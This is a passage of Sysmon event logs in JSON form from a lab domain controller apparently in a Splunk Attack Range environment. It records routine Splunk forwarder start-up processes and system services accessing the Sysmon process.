Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.775","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010EB8B0500}","SourceProcessId":"4548","SourceThreadId":"4544","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3677,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.799\r\nProcessGuid: {E2A3D6B1-1104-5F25-0000-0010468E0500}\r\nProcessId: 4552\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nParentProcessId: 3828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.799","ProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010468E0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","ParentProcessId":"3828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3678,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nSourceProcessId: 3828\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010468E0500}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","SourceProcessId":"3828","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010468E0500}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3679,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010468E0500}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010468E0500}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3680,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3681,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3682,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3683,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3684,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
